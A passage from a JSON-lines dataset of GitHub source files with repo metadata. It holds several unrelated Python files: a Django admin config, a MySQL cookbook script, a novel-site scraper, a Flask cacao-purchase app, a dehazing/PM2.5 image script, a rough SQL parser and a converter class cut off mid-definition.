\"coltwoheader\",\n \"colthreeheader\",\"colonetext\",\n \"coltwotext\", \"colthreetext\",)}),)\nclass HomePageAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + homepage_extra_fieldsets\n\n#SERVICES ADMIN\nservices_extra_fieldsets = ((None, {\"fields\": (\"headertext\",\"colonetext\", \"coltwotext\",)}),)\nclass ServicesAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + services_extra_fieldsets\n\nadmin.site.register(About, AboutAdmin)\nadmin.site.register(HomePage, HomePageAdmin)\nadmin.site.register(Services, ServicesAdmin)\n\n ","repo_name":"mmansour/ijc","sub_path":"ijctheme/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"37131060661","text":"#!/usr/bin/python3\n# get_enumorset_info.py: wrapper to demonstrate get_enumorset_info()\n# utility routine.\n\n# Usage: get_enumorset_info.py db_name tbl_name col_name\n\nimport sys\nimport mysql.connector\nimport cookbook\nfrom cookbook_utils import *\n\n\nif len(sys.argv) != 4:\n print(\"Usage: get_enumorset_info.py db_name tbl_name col_name\")\n sys.exit(1)\ndb_name = sys.argv[1]\ntbl_name = sys.argv[2]\ncol_name = sys.argv[3]\n\ntry:\n conn = cookbook.connect()\nexcept mysql.connector.Error as e:\n print(\"Error code: %s\" % e.errno)\n print(\"Error message: %s\" % e.msg)\n sys.exit(1)\n\n#@ _USE_FUNCTION_\ninfo = get_enumorset_info(conn, db_name, tbl_name, col_name)\nprint(\"Information for \" + db_name + \".\" + tbl_name + \".\" + col_name + \":\")\nif info is None:\n print(\"No information available (not an ENUM or SET column?)\")\nelse:\n print(\"Name: %s\" % info[\"name\"])\n print(\"Type: %s\" % info[\"type\"])\n print(\"Legal values: %s\" % \",\".join(info[\"values\"]))\n if info[\"nullable\"]:\n print(\"Nullable: yes\")\n else:\n print(\"Nullable: no\")\n if info[\"default\"] is None:\n print(\"Default value: NULL\")\n else:\n print(\"Default value: %s\" % info[\"default\"])\n#@ _USE_FUNCTION_\n\nconn.close()\n","repo_name":"shangzongyu/source-code","sub_path":"src/mysqlcookbook/recipes/metadata/get_enumorset_info.py","file_name":"get_enumorset_info.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"30"} +{"seq_id":"19187700636","text":"import numbers\r\nimport requests\r\nfrom lxml import html\r\nimport re\r\nimport reqtest as req\r\njudul = input(\"cari: \")\r\nwebLnk = ('https://engnovel.com/?s='+judul)\r\n\r\n# path list:\r\nLinkPath = '//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div[1]/div[2]/a/@href'\r\nTitlePath = '//*[@id=\"truyen\"]/div[1]/div/div[1]/div/div[3]/h3'\r\nRatePath = '/html/body/div[1]/div[3]/div[1]/div/div[1]/div/div[3]/div[1]'\r\nDescPath = '//*[@id=\"truyen\"]/div[1]/div/div[1]/div/div[3]/div[2]'\r\nLastetChap = '//*[@id=\"new-chapter\"]/div[2]/div/ul/li[1]/a/@href'\r\n\r\ndef chapterGetter(chapter):\r\n fn = re.findall(\"[0-9]\",str(chapter))\r\n fr = list(map(int, fn))\r\n s = [str(integer) for integer in fr]\r\n a_string = \"\".join(s)\r\n res = int(a_string)\r\n return res\r\ndef linkGetter():\r\n resp = requests.get(webLnk)\r\n byte_data = resp.content\r\n source_code = html.fromstring(byte_data)\r\n tree = source_code.xpath(LinkPath)\r\n tr = source_code.xpath('//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div/div[2]/div[4]')\r\n linkan = tree[0]\r\n chp = tr[0].text_content()\r\n print(linkan)\r\n return linkan\r\n\r\ndef listedChapter(lasted):\r\n resp = requests.get(webLnk)\r\n byte_data = resp.content\r\n source_code = html.fromstring(byte_data)\r\n tr = source_code.xpath('//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div/div[2]/div[4]')\r\n chp = tr[0].text_content()\r\n chapamount = chapterGetter(chp)\r\n for x in range(1, chapamount):\r\n data = req.getLnk(lasted, x)\r\n print(data)\r\ndef descGetter():\r\n url = linkGetter()\r\n rsp = requests.get(url)\r\n bt = rsp.content\r\n sc = html.fromstring(bt)\r\n tr = sc.xpath(TitlePath)\r\n new = sc.xpath(DescPath)\r\n rw = sc.xpath(RatePath)\r\n lastcp = sc.xpath(LastetChap)\r\n Lasted = lastcp[0]\r\n lx = Lasted.split(\"chapter-\")[1:]\r\n rating = rw[0].text_content()\r\n Deskirpsi = new[0].text_content()\r\n titles = tr[0].text_content()\r\n print(\"Title: \",titles+\"\\nrating: \"+rating+\"\\nDesc: \"+Deskirpsi)\r\n listedChapter(Lasted)\r\ndescGetter()","repo_name":"zarlicho/engnovel-Scrape","sub_path":"engnovel.py","file_name":"engnovel.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74564131564","text":"from flask import render_template, request, redirect, url_for, flash, session\nfrom sqlalchemy import func\nfrom app import app, db\nfrom src.models import Cosecha, TipoRecolector, Recolector, Compra, Evento, Banco\nfrom src.decoradores import login_required\nfrom src.verificadores import verificar_cosecha_exists\nimport datetime\n\n@app.route(\"/cosecha//\", methods=['GET', 'POST'])\n@login_required\ndef compras(cosecha_id, tipo):\n \"\"\" Generar Compras / Listar Compras \"\"\"\n\n error=None\n compras = Compra.query.filter_by(cosecha_id=cosecha_id).all()\n recolectores = Recolector.query.all()\n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, tipo, cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n \n if request.method == \"POST\":\n # Verifica que el recolector esté en la base de datos\n cedula = request.form['cedula']\n recolector = Recolector.query.filter_by(ci=cedula).first()\n if recolector is None:\n tipo_recolector = TipoRecolector.query.all()\n error = \"El recolector no se encuentra registrado. Registre el recolector antes de realizar la compra\"\n return render_template(\"recolector.html\", error=error, tipo_prod=tipo_recolector, recolector=recolectores) \n\n try:\n fecha = datetime.datetime.now()\n clase_cacao = request.form['clase_cacao']\n precio = request.form.get('precio', type=float)\n cantidad = request.form.get('cantidad', type=float)\n humedad = request.form.get('humedad', type=float)\n merma_porcentaje = request.form.get('merma_porcentaje', type=float)\n monto = request.form.get('monto', type=float)\n observacion = request.form['observacion']\n almendra = True if request.form.get(\"almendra\") == \"on\" else False\n\n # Calcula atributos derivables\n if almendra:\n merma_porcentaje *= 2\n merma_kg = merma_porcentaje / 100 * cantidad\n cantidad_total = cantidad - merma_kg\n\n compra = Compra(cosechas=cosecha, fecha=fecha, recolectores=recolector, \n clase_cacao=clase_cacao, precio=precio, cantidad=cantidad, humedad=humedad, \n merma_porcentaje=merma_porcentaje, merma_kg=merma_kg, cantidad_total=cantidad_total, monto=monto, \n observacion=observacion, almendra=almendra)\n\n evento_user = session['usuario']\n operacion = 'Agregar Compra'\n modulo = 'Compra'\n evento_desc = str(compra)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n nro_compra = Compra.query.count()\n monto = compra.monto\n concepto = 'Débito por compra Nro. {}'.format(nro_compra)\n transaccion = Banco(fecha=fecha, concepto=concepto, monto=monto, compra_id=nro_compra, credito=False)\n\n db.session.add(evento)\n db.session.add(compra)\n db.session.add(transaccion)\n db.session.commit()\n\n flash('Se ha registrado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=tipo)) \n except:\n error = \"Hubo un error agregando la compra.\"\n\n hide = True if tipo == \"listar\" else False\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, recolectores=recolectores,\n total_cantidad=total_cantidad, total_monto=total_monto, hide=hide)\n\n@app.route(\"/cosecha///search\", methods=['GET', 'POST'])\n@login_required\ndef search_compras(cosecha_id, tipo):\n \"\"\" Search Bar de Generar Compras / Listar Compras \"\"\"\n\n error = None\n compras = []\n \n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, tipo, cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n \n if request.method == \"POST\":\n compras_desde, compras_hasta = Compra.query.filter_by(cosecha_id=cosecha_id), Compra.query.filter_by(cosecha_id=cosecha_id)\n fecha_inicio, fecha_fin = request.form['Desde'], request.form['Hasta']\n if (fecha_inicio != ''):\n compras_desde = Compra.query.filter(Compra.fecha >= fecha_inicio, Compra.cosecha_id==cosecha_id)\n if (fecha_fin != ''):\n compras_hasta = Compra.query.filter(Compra.fecha <= fecha_fin, Compra.cosecha_id==cosecha_id)\n \n # Intersecta las dos tablas de compras_desde y compras_hasta\n compras_fecha = compras_desde.intersect(compras_hasta)\n \n palabra = request.form['search_compra']\n clase_cacao = Compra.query.filter(Compra.clase_cacao.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n precio = Compra.query.filter(Compra.precio.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n cantidad = Compra.query.filter(Compra.cantidad.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n humedad = Compra.query.filter(Compra.humedad.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n merma_porcentaje = Compra.query.filter(Compra.merma_porcentaje.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n merma_kg = Compra.query.filter(Compra.merma_kg.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n cantidad_total = Compra.query.filter(Compra.cantidad_total.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n monto = Compra.query.filter(Compra.monto.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n observacion = Compra.query.filter(Compra.observacion.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n compras = clase_cacao.union(precio, cantidad, humedad, merma_porcentaje, merma_kg, cantidad_total, monto, observacion)\n \n tmp = Recolector.query.filter(Recolector.ci.like('%' + palabra + '%')).first()\n if tmp is not None:\n prod = Compra.query.filter(Compra.recolector_id.like('%' + str(tmp.id) + '%'), Compra.cosecha_id==cosecha_id)\n compras = compras.union(prod)\n\n tmp = TipoRecolector.query.filter(TipoRecolector.descripcion.like('%' + palabra + '%')).first()\n if tmp is not None:\n cmp = Compra.query.filter(Compra.recolector_id.like('%' + str(tmp.id) + '%'), Compra.cosecha_id==cosecha_id)\n compras = compras.union(cmp) \n\n compras = compras_fecha.intersect(compras)\n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n hide = True if tipo == \"listar\" else False\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, \n total_cantidad=total_cantidad, total_monto=total_monto, hide=hide) \n\n@app.route('/cosecha//compras//delete', methods=['GET', 'POST'])\n@login_required\ndef delete_compra(cosecha_id, compra_id):\n \"\"\" Borrar datos de compra \"\"\"\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, \"compras\", cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n\n compra_to_delete = Compra.query.get_or_404(compra_id)\n if request.method == \"POST\":\n try:\n fecha = datetime.datetime.now()\n evento_user = session['usuario']\n operacion = 'Eliminar Compra'\n modulo = 'Compra'\n evento_desc = str(compra_to_delete)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n #desligar la compra de la cosecha: cambiar compra id a Null\n banco_id = Banco.query.filter_by(compra_id=compra_id).first().id\n transaccion = Banco.query.filter_by(id = banco_id).first()\n transaccion.compra_id = None\n\n # Crear un credito por reverso de fondos\n monto = compra_to_delete.monto\n concepto = 'Reverso de compra'\n reverso = Banco(fecha=fecha, concepto=concepto, monto=monto, compra_id=compra_id, credito=True)\n\n db.session.add(reverso)\n db.session.add(evento)\n db.session.delete(compra_to_delete)\n db.session.commit()\n \n flash('Se ha eliminado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n except:\n error = \"Hubo un error borrando la cosecha.\"\n \n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n\n@app.route('/cosecha//compras//update', methods=['GET', 'POST'])\n@login_required\ndef update_compra(cosecha_id, compra_id):\n \"\"\" Editar datos de compra \"\"\"\n \n error=None\n tipo_prod = TipoRecolector.query.all()\n compras = Compra.query.filter_by(cosecha_id=cosecha_id).all()\n recolectores = Recolector.query.all()\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, \"compras\", cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n\n # Verificar que la compra exista en la base de datos\n compra = Compra.query.filter_by(id=compra_id).first()\n if compra is None:\n error = \"La compra no se encuentra registrada.\"\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, tipo_prod=tipo_prod, recolectores=recolectores)\n\n if request.method == \"POST\":\n try:\n evento_desc = str(compra)\n compra.clase_cacao = request.form['clase_cacao']\n compra.precio = request.form.get('precio', type=float)\n compra.cantidad = request.form.get('cantidad', type=float)\n compra.humedad = request.form.get('humedad', type=float)\n compra.merma_porcentaje = request.form.get('merma_porcentaje', type=float)\n compra.monto = request.form.get('monto', type=float)\n compra.observacion = request.form['observacion']\n almendra = True if request.form.get(\"almendra\") == \"on\" else False\n compra.almendra = almendra\n\n # Calcula atributos derivables\n if almendra:\n compra.merma_porcentaje = 2 * request.form.get('merma_porcentaje', type=float)\n compra.merma_kg = compra.cantidad * compra.merma_porcentaje / 100\n compra.cantidad_total = compra.cantidad - compra.merma_kg\n\n fecha = datetime.datetime.now()\n evento_user = session['usuario']\n operacion = 'Editar Compra'\n modulo = 'Compra'\n evento_desc += \";\" + str(compra)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n banco_id = Banco.query.filter_by(compra_id=compra_id).first().id\n transaccion = Banco.query.filter_by(id=banco_id).first()\n transaccion.monto = compra.monto\n\n db.session.add(evento)\n db.session.commit()\n flash('Se ha actualizado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n except:\n error = \"Hubo un error actualizando la cosecha.\"\n \n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, \n total_cantidad=total_cantidad, total_monto=total_monto)","repo_name":"fungikami/SAGC","sub_path":"src/compras.py","file_name":"compras.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6432634946","text":"# Python For Reference\n\n# Declaring Variables\nsome_list = [ \"fizzbuzz-js\", \"warehouse-js\", \"bowling-js\", \"lottery-js\", \"merge-js\", \"multiplication-js\", \"99bottles-js\", \"test-py\" ]\n\n\n# For Loop\nfor x in some_list:\n print(x + \"\\n\")\n\n# Sort List\nsorted_list = sorted( some_list, key=str.lower)\n","repo_name":"seattleskyline/CodingChallenges","sub_path":"references/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19331284641","text":"#1436번. 영화감독 숌\n#666을 포함하는 숫자 중 몇 번째 숫자인지 출력\nn=int(input())\nmovie=666\ncount=0\n#movie를 1씩 더해감\nwhile(True):\n #666이 안에 있으면 count를 증가\n if \"666\" in str(movie):\n count+=1\n #count가 입력받은 값과 같다면 movie출력\n if count==n:\n print(movie) \n break\n movie+=1","repo_name":"Mercurius-0227/Baekjoon","sub_path":"movie_1436.py","file_name":"movie_1436.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11057188964","text":"import cv2\nimport numpy as np\n\n\n'''\ndef zmMinFilterGray(src, r=7):\n 最小值滤波,r是滤波器半径\n if r <= 0:\n return src\n #print(src.shape)\n #print(src.shape[:2])\n h, w = src.shape[:2]\n print(h,w);\n I = src\n print(list(range(1, h)) + [h - 1]);\n #print(np.array(I[[0] + list(range(h - 1)),:]).shape);\n res = np.minimum(I, I[[0] + list(range(h - 1)), :])\n #print(list(range(1, h)) + [h - 1]);\n res = np.minimum(res, I[list(range(1, h)) + [h - 1], :])\n I = res\n res = np.minimum(I, I[:, [0] + list(range(w - 1))])\n res = np.minimum(res, I[:, list(range(1, w)) + [w - 1]])\n return zmMinFilterGray(res, r - 1)\n'''\n#h,w为左上角像素的坐标,src\ndef minLvBoVec(src,rh,rw,h,w):\n #mat = src[h:h + 2 * r + 1, w:w + 2 * r + 1];\n mat=src[h:h + rh, w:w + rw];\n #print(mat*255)\n value = np.mat(mat).min();\n #new_mat = np.ones((2 * r + 1, 2 * r + 1))\n new_mat=np.ones((rh, rw))\n new_mat =new_mat*value;\n #f=open(\"doc.txt\",'w');\n #f.write(str(value)+'\\n');\n #print(value*255);\n return new_mat;\n\ndef zmMinFilterGray(src, r=7):\n\n #height,width=src.shape;\n\n #minVec=np.zeros(height,width);\n #最小滤波器做法1\n #minVec=src;\n # w=int(r/2);\n #1.中间进行最小值滤波\n '''\n for i in range(w,height-w):\n for j in range(w,width-w):\n mats=src[i-w:i+w+1,j-w:j+w+1];\n print(mats*255)\n value=np.mat(mats).min()\n minVec[i][j]=value;\n print(i,j,value*255);\n return minVec;\n '''\n '''\n height, width = src.shape;\n minVec = src;\n #非边缘位置\n hh,ww=int(height/r),int(width/r);\n for i in range(hh-1):\n for j in range(ww-1):\n h=i*r;w=j*r;\n mat=minLvBoVec(src,r,r,h,w);\n minVec[h:h + r, w:w + r] = mat;\n #minVec[h:h+2*r+1,w:w+2*r+1]=mat;\n\n #最下面的一行(不包含右下角)\n for j in range(ww-1):\n h=(hh-1)*r;w=j*r;\n new_r=(height-h);\n mat = minLvBoVec(src,new_r,r,h,w);\n minVec[h:height, w:w + r] = mat\n\n #最右边一列(不包含右下角)\n for i in range(hh-1):\n h=i*r;w=(ww-1)*r;\n new_r=width-w;\n mat = minLvBoVec(src,r,new_r, h, w);\n minVec[h:h + r,w:width] = mat;\n\n #最右下角 h=height-(hh-1)*r;w=width-ww-1)*r;\n h=(hh-1)*r;w=(ww-1)*r;\n rh=height-h;rd=width-w;\n mat=minLvBoVec(src,rh,rd,h,w);\n minVec[h:height,w:width]=mat;\n return minVec;\n '''\n return cv2.erode(src, np.ones((r, r)))\n\n#窗口半径,p为误差校验值\ndef guidedfilter(I, p, r, eps):\n '''''引导滤波,直接参考网上的matlab代码'''\n height, width = I.shape\n m_I = cv2.boxFilter(I, -1, (r, r))\n m_p = cv2.boxFilter(p, -1, (r, r))\n m_Ip = cv2.boxFilter(I * p, -1, (r, r))\n cov_Ip = m_Ip - m_I * m_p\n\n m_II = cv2.boxFilter(I * I, -1, (r, r))\n var_I = m_II - m_I * m_I\n\n a = cov_Ip / (var_I + eps)\n b = m_p - a * m_I #\n\n m_a = cv2.boxFilter(a, -1, (r, r))\n m_b = cv2.boxFilter(b, -1, (r, r))\n #print(m_a)\n return m_a * I + m_b\n\ndef getV1(m, r, eps,w, maxV1): # 输入rgb图像,值范围[0,1]\n '''计算大气遮罩图像V1和光照值A, V1 = 1-t/A'''\n Vc = np.min(m, 2) # 得到暗通道图像\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\gray_img.jpg\", Vc*255)\n\n Vc_min=zmMinFilterGray(Vc, 5) #最小值滤波后\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\min_img.jpg\", Vc_min * 255)\n V1 = guidedfilter(Vc, Vc_min, r, eps) # 使用引导滤波优化\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\guide_img.jpg\", V1 * 255)\n\n V1=np.clip(V1,0.0,1.0);\n\n bins = 2000; #原来为2000份\n ht = np.histogram(Vc, bins) # 计算大气光照A 统计函数,分成1000份进行统计\n d = np.cumsum(ht[0]) / float(V1.size) #d中d[i]为ht[0]前i项之和\n #从后往前进行统计\n for lmax in range(bins - 1, 0, -1):\n if d[lmax] <= 0.999:\n break\n try:\n #print( np.mean(m, 2)[V1 >= ht[1][lmax]])\n A = np.mean(m, 2)[V1 >= ht[1][lmax]].max() #大于前0.1%中取最大值\n except:\n A=0.95;\n return V1, A\n\ndef deHaze(m, r=100, eps=0.05, w=0.90, maxV1=0.80, bGamma=False):\n Vc = np.min(m, 2) # 得到暗通道图像\n Vv=Vc*255;\n Y = np.zeros(m.shape)\n Yc=np.zeros(m.shape)\n V1, A = getV1(m, r, eps,w, maxV1) # 得到暗通道图像和大气光照\n\n tx=1-w*(V1/A);\n #print(tx.shape)\n #tx=guidedfilter(Vc,tx,r,eps);\n #tx1=1-w*(Vc/A);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\transmissiontx.jpg\",tx*255);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\transmissiontx1.jpg\", tx1 * 255);\n\n t0=np.ones(tx.shape);\n t0=t0*0.1;\n tx = np.maximum(tx, t0);\n\n\n '''\n for k in range(3):\n #Yc[:, :, k] = (m[:, :, k] - V1) / (1 - Vc / A) # 颜色校正\n Y[:,:,k]=(m[:,:,k]-A)/np.maximum(tx,t0)+A; #恢复公式\n Yc[:, :, k] = (m[:, :, k] - A) / np.maximum(tx1, t0) + A; # 恢复公式\n\n Y = np.clip(Y, 0.0, 1.0) #将Y的元素的值限制在0,1\n Yc=np.clip(Yc,0.0,1.0);\n if bGamma:\n Y = Y ** (np.log(0.5) / np.log(Y.mean())) # gamma校正,默认不进行该操作\n '''\n\n #print(tx.flatten());\n\n return tx.flatten();\n\n#基于cv实现图像缩放\ndef ResizeImage(OringinImage):\n\n try:\n newSize=(20,20); #图像缩放后同一为300*300\n #h,w=OringinImage.shape;\n newImage=cv2.resize(OringinImage,newSize,cv2.INTER_LINEAR);\n return newImage;\n except cv2.error as e:\n raise RuntimeError(\"OriginImage None\");\n\ndef TrainData(List):\n TrainSet=[];#newSize=(300,300);\n for item in List:\n #提取图片,并将图像缩放到统一的像素\n init_image=cv2.imread(\"image/\"+item);\n newImage = ResizeImage(init_image);\n tx=deHaze(newImage/255.0);\n TrainSet.append(tx);\n\n return TrainSet;\n\ndef getTx(Image):\n #mat=cv2.imread(\"Data1/image0/(1).jpg\");\n #print(mat);\n #try:\n tx=deHaze(ResizeImage(cv2.imread(\"Data1/\"+Image))/255.0);\n tx=tx.flatten();\n #tx=np.sort(tx)[:300];\n #print(Image,tx);\n #tx=tx*255;\n #image=ResizeImage(cv2.imread(\"Data1/\"+Image));\n #tx=np.min(image,2);\n return tx;\n #return tx.flatten();\n # except:\n # raise \"Error\";\n#为测试集创建的tx,直接读取文件路径\ndef getTx_test(image):\n tx=deHaze(ResizeImage(cv2.imread(image))/255.0);\n tx=tx.flatten();\n return tx;\n\ndef TestSet():\n List=[1,1,3,5]\n return List;\ndef getSize():\n return 300*300;\nif __name__ == '__main__':\n List=[\"30.jpg\",\"52.5.jpg\",\"54.jpg\",\"54.5.jpg\",\"56.jpg\",\"56.5.jpg\",\"98.5.jpg\",\"164.5.jpg\",\"256.5.jpg\"];\n trainSet=TrainData(List);\n print(len(trainSet));\n mat=cv2.imread('image/54.5.jpg');\n cv2.COLOR_RGB2GRAY\n #mat=cv2.imread('image/54.5.jpg');\n #array=np.array(mat);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img.jpg\",mat)\n\n #V1,Vc = deHaze(cv2.imread('image/54.5.jpg') / 255.0);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img_result_guider.jpg\", V1*255)\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img_result.jpg\", Vc*255)\n","repo_name":"coldwater007/pm2.5_img_analysic","sub_path":"source/特征提取/PM25Test.py","file_name":"PM25Test.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"16090808250","text":"import regex as re\nimport pandas as pd\nfrom collections import defaultdict\n\ndef tables_in_query(sql_str):\n\n # remove the /* */ comments\n q = re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sql_str)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n\n # scan the tokens. if we see a FROM or JOIN, we set the get_next\n # flag, and grab the next one (unless it's SELECT).\n\n result = set()\n get_next = False\n for tok in tokens:\n if get_next:\n if tok.lower() not in [\"\", \"select\"]:\n result.add(tok)\n get_next = False\n get_next = tok.lower() in [\"from\", \"join\"]\n\n return result\n\nsample_query = \"\"\"SELECT\n c.calendar_date,\n c.calendar_year,\n c.calendar_month,\n c.calendar_dayname,\n COUNT(DISTINCT co.order_id) AS num_orders,\n COUNT(ol.book_id) AS num_books,\n SUM(ol.price) AS total_price,\n SUM(COUNT(ol.book_id)) OVER (\n PARTITION BY c.calendar_year, c.calendar_month\n ORDER BY c.calendar_date\n ) AS running_total_num_books,\n LAG(COUNT(ol.book_id), 7) OVER (ORDER BY c.calendar_date) AS prev_books\n FROM calendar_days c\n LEFT JOIN cust_order co ON c.calendar_date = DATE(co.order_date)\n LEFT JOIN order_line ol ON co.order_id = ol.order_id\n GROUP BY c.calendar_date, c.calendar_year, c.calendar_month, c.calendar_dayname\n ORDER BY c.calendar_date ASC;\"\"\"\n\ntable_names = tables_in_query(sample_query)\n\ndef GetAliases(sample_query):\n q = re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sample_query)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n\n it = iter(tokens)\n tokens[:] = [f\"{i}:{next(it)}\" if i in table_names else i for i in it]\n\n aliases = []\n temp = r'(%s.*)' % ':.*|'.join(table_names)\n for i in tokens:\n match = re.findall(temp,i)\n if len(match) >0 :\n aliases.append(re.sub(r\"[\\['\\]]\", \"\", f'{match}'))\n aliases\n\n aliases_dict = {}\n for aliase in aliases:\n aliases_dict[aliase.split(\":\")[0]] = aliase.split(\":\")[1]\n \n return aliases_dict\n\ndef GetQueryColumns(tables):\n aliases_dict = GetAliases(sample_query)\n columns = []\n column_string = r'(^%s\\W\\w*)' % '\\W\\w*|^'.join(aliases_dict.values())\n for i in tokens:\n match = re.findall(column_string,i)\n if len(match) > 0 :\n columns.append(re.sub(r\"[\\['\\]]\", \"\", f\"{match}\"))\n column_names = set(columns)\n\n aliases = []\n columns = []\n for x in column_names:\n aliases.append(x.split('.')[0])\n columns.append(x.split('.')[1])\n\n combined_dict = defaultdict(list)\n for k, v in zip(aliases,columns):\n combined_dict[k].append(v)\n \n return combined_dict\n\nquery2 = \"\"\"\n SELECT ProductID, Name, SellStartDate FROM SalesLT.Product \n WHERE year(SellStartDate)='2005';\n \"\"\"\n\ndef GetFilters(sql_string):\n # remove the /* */ comments\n q = re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sql_string)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n \n # scan the tokens. if we see a FROM or JOIN, we set the get_next\n # flag, and grab the next one (unless it's SELECT).\n filters = re.findall(r'WHERE(.*);', sql_string)\n\n return filters","repo_name":"carolashb/work-stuff","sub_path":".ipynb_checkpoints/SQLParse-checkpoint.py","file_name":"SQLParse-checkpoint.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10236991647","text":"\"\"\"convert iscouttask\"\"\"\n\n# -*- coding:utf-8 -*-\n\nimport traceback\n\nfrom datacontract import DataSeg, InputData, IscoutTask\nfrom dataparser import DataParser\n\nfrom .converterstandard import ConverterStandard\n\n\nclass ConverterIScoutTask(ConverterStandard):\n \"\"\"\n fields: 当前转换器需要验证的字段集合,> <字段名,<是否必要,是否区分大小写>>\n \"\"\"\n\n def __init__(self, uniquename, fields: dict, extendfields: dict,\n extensions: list):\n\n if not isinstance(extensions, list) or len(extensions) < 1:\n raise Exception(\n \"Specified ConverterIScoutTask extension is invalid\")\n\n ConverterStandard.__init__(self, uniquename, fields, extensions,\n extendfields)\n\n def _convert(self, data: InputData) -> iter:\n 